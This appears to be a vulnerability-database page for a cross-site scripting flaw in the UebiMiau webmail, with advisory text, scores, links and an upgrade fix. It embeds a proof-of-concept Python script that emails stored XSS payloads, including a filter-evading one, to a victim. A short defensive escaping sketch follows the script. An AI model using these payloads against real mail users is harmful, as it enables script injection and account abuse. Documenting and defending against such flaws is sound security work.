CVE-2006-0469
CVSS 4.3
Published: 2006-01-30 13:03:00
Last revised: 2011-03-07 21:30:05

[Original] Cross-site scripting (XSS) vulnerability in UebiMiau 2.7.9, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag.


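[CNNVD] UebiMiau HTML E-mail Cross-Site Scripting Vulnerability (CNNVD-200601-362)

        A cross-site scripting (XSS) vulnerability exists in UebiMiau 2.7.9 and earlier versions. A remote attacker can inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag.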

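- CVSS (Base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: NONE [No impact on the confidentiality of the system]
Integrity impact: PARTIAL [System files may be modified]
Availability impact: NONE [No impact on the availability of the system]
Attack complexity: MEDIUM [Exploitation requires certain access conditions]
Attack vector: NETWORK [The attacker does not need intranet or local access]
Authentication: NONE [Exploitation requires no authentication]

- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links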

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0469
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0469
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-362
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/24375
(UNKNOWN)  XF  uebimiau-html-xss(24375)
http://www.vupen.com/english/advisories/2006/0388
(UNKNOWN)  VUPEN  ADV-2006-0388
http://www.uebimiau.org/news.php
(UNKNOWN)  CONFIRM  http://www.uebimiau.org/news.php
http://www.securityfocus.com/bid/16413
(UNKNOWN)  BID  16413
http://www.securityfocus.com/archive/1/archive/1/423437/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060129 UebiMiau Webmail System Security Vulnerability
http://secunia.com/advisories/18655
(UNKNOWN)  SECUNIA  18655
http://securityreason.com/securityalert/387
(UNKNOWN)  SREASON  387

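- Vulnerability information

UebiMiau HTML E-mail Cross-Site Scripting Vulnerability
Medium severity  Cross-site scripting
2006-01-30 00:00:00 2007-06-01 00:00:00
Remote
        A cross-site scripting (XSS) vulnerability exists in UebiMiau 2.7.9 and earlier versions. A remote attacker can inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue, along with related updates.

- Vulnerability information (20675)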

Uebimiau Webmail 2.7.2 Stored XSS (EDBID:20675)
php webapps
2012-08-20 Not Verified
0 Shai rod
#!/usr/bin/python

'''
# Exploit Title: Uebimiau Webmail Stored XSS
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.uebimiau.org/
# Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
# Version: 2.7.2
 
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar


About the Application:
======================

Uebimiau is a universal webmail developed in PHP by Aldoir Ventura.
It is free and can be installed in any email server.

-It runs under any System;
-It doesn't require any extra PHP modules;
-Doesn't need a database (as MySQL, PostgreSQL, etc.)
-Doesn't need IMAP, but compatible with POP3 and IMAP
-Compatible with the MIME Standard (send/receive text/html emails);
-Doesn't need cookies;
-Easy installation. You only modify one file;
-Compatible with Apache, PHP, Sendmail or QMAIL;
-Can be easily translated into any language (already translated in 17 languages);
-Can use a variety of skins




Vulnerability Description
=========================


1. Stored XSS in e-mail body.

XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>

Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.


2. Stored XSS in "Title" field ( works when victim opens message in full view).

XSS Payload: SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")>

This one requires you to send at least 2 messages to the victim with the payload in the email subject.

Location of injection in page source:

<a class="menu" href="readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" 
title="Uebimiau Webmail Stored XSS POC "><img src='1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: 
<a class="menu" href="javascript:goback()">Back</a> ::

3. Stored XSS in Address Book

XSS Payload: <script>alert("XSS")</script>

Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.

'''

import smtplib

print "###############################################"
print "#      Uebimiau Webmail Stored XSS POC        #"
print "#            Coded by: Shai rod               #"
print "#               @NightRang3r                  #"
print "#           http://exploit.co.il              #"
print "#       For Educational Purposes Only!        #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server  = "10.0.0.5"
smtp_port = 25
subject = "Uebimiau Webmail Stored XSS POC"
xss_payload_1 = """ "><img src='1.jpg'onerror=javascript:alert("XSS")>"""
xss_payload_2 =  """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, ", ".join(recipient), subject + xss_payload_1) )
msg += "Content-type: text/html\n\n"
msg += """Nothing to see here...\r\n"""
msg += xss_payload_2
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
print "[*] Sending Message 1\r"
server.sendmail(sender, recipient, msg)
print "[*] Sending Message 2\r"
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"
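
On the defensive side, the two injection points this record describes (the message subject reflected into the `title` attribute of the "Next" link, and a `javascript:` URI in an IMG SRC) are closed by attribute-context escaping and a scheme allowlist. The following Python 3 sketch is an added example, not code from UebiMiau, the CVE entry or the exploit author; `img_src_allowed`, `render_next_link`, the allowlist and the sample values are hypothetical names and constructed inputs.

```python
import html
import re
from urllib.parse import urlsplit

# Assumption: policy for this sketch; only these schemes may load images in mail.
ALLOWED_IMG_SCHEMES = {"http", "https", "cid"}

# Browsers strip leading control characters and spaces and drop tabs and
# newlines anywhere in a URL; this sketch removes all of them (a superset).
_IGNORED = re.compile(r"[\x00-\x20\x7f]+")

# Constructed inputs, modelled on the subject and link shown in the page source.
SAMPLE_SUBJECT = 'Uebimiau Webmail Stored XSS POC "><img src=\'1.jpg\'onerror=javascript:alert("XSS")>'
SAMPLE_HREF = "readmsg.php?folder=inbox&pag=1&ix=1"


def img_src_allowed(src: str) -> bool:
    """True only for an absolute URL whose scheme is on the allowlist."""
    # Decode character references first: "jav&#x09;ascript:" is still javascript:.
    cleaned = _IGNORED.sub("", html.unescape(src))
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:  # malformed URL: reject rather than guess
        return False
    return scheme in ALLOWED_IMG_SCHEMES


def render_next_link(href: str, subject: str) -> str:
    """Build the 'Next' anchor with both values escaped for attribute context."""
    return '<a class="menu" href="{}" title="{}">Next</a>'.format(
        html.escape(href, quote=True), html.escape(subject, quote=True)
    )


if __name__ == "__main__":
    print(render_next_link(SAMPLE_HREF, SAMPLE_SUBJECT))
    for src in ("https://example.com/a.png", "cid:logo", "javascript:alert(1)",
                " JaVa\tScRiPt:alert(1)", "jav&#x09;ascript:alert(1)", "1.jpg"):
        print(repr(src), img_src_allowed(src))
```

Relative sources such as `1.jpg` are rejected on purpose: in rendered mail there is no trustworthy base URL to resolve them against.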
		

- Vulnerability information

22807
UebiMiau Webmail HTML Email Body XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-01-28 2006-01-12
2006-01-28 Unknown

- Solution

Upgrade to version 2.7.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
